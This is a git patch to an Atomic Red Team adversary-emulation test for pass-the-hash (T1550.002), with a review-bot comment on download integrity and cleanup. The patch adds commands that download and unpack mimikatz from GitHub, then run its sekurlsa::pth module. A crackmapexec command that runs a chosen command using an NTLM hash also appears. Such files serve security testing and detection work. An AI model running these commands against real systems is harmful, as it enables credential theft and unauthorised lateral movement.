From 5ba2d3e985ff6201b58a9cfe1b0699870167d92e Mon Sep 17 00:00:00 2001
From: Brian Thacker
Date: Tue, 6 Oct 2020 11:13:14 -0500
Subject: [PATCH] Update T1550.002.yaml (#1235) added code to make prereq commands for test 1.
---
 atomics/T1550.002/T1550.002.yaml | 21 +++++++++++++++++++--
 1 file changed, 19 insertions(+), 2 deletions(-)
diff --git a/atomics/T1550.002/T1550.002.yaml b/atomics/T1550.002/T1550.002.yaml
index aae952e0..58964500 100644
--- a/atomics/T1550.002/T1550.002.yaml
+++ b/atomics/T1550.002/T1550.002.yaml
@@ -21,9 +21,26 @@ atomic_tests:
 description: domain
 type: string
 default: atomic.local
+ mimikatz_path:
+ description: mimikatz windows executable
+ type: Path
+ default: '%tmp%\mimikatz\x64\mimikatz.exe'
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})
+ prereq_command: |
+ $mimikatz_path = cmd /c echo #{mimikatz_path}
+ if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
+ get_prereq_command: |
+ $mimikatz_path = cmd /c echo #{mimikatz_path}
+ Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+ Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
+ New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
+ Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
 executor:
 command: |
- mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
+ #{mimikatz_path} sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
 name: command_prompt
 - name: crackmapexec Pass the Hash
 auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9
@@ -63,4 +80,4 @@ atomic_tests:
 executor:
 command: |
 crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command}
- name: command_prompt
\ No newline at end of file
+ name: command_prompt
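Review bot: The added `get_prereq_command` in the first hunk downloads `mimikatz_trunk.zip` with `Invoke-WebRequest` and extracts it without checking it against a known digest, so a replaced release asset or a tampered download would later be run by the executor on the test host unnoticed. Pin the expected hash next to the URL and stop before `Expand-Archive` when it differs, e.g. `if ((Get-FileHash "$env:TEMP\mimikatz.zip" -Algorithm SHA256).Hash -ne '<EXPECTED_SHA256>') { exit 1 }`, where the placeholder is filled from a verified copy of that release. The block also leaves `mimikatz.zip` and the extracted tree in `$env:TEMP`, and no cleanup step is visible in this hunk (the test entry starts and may continue outside it), so removing the archive at the end of the prereq would keep the tool from lingering on hosts after a run. In the executor, `#{mimikatz_path}` is unquoted, so a `%tmp%` that expands to a path containing spaces would break the command line under `command_prompt`.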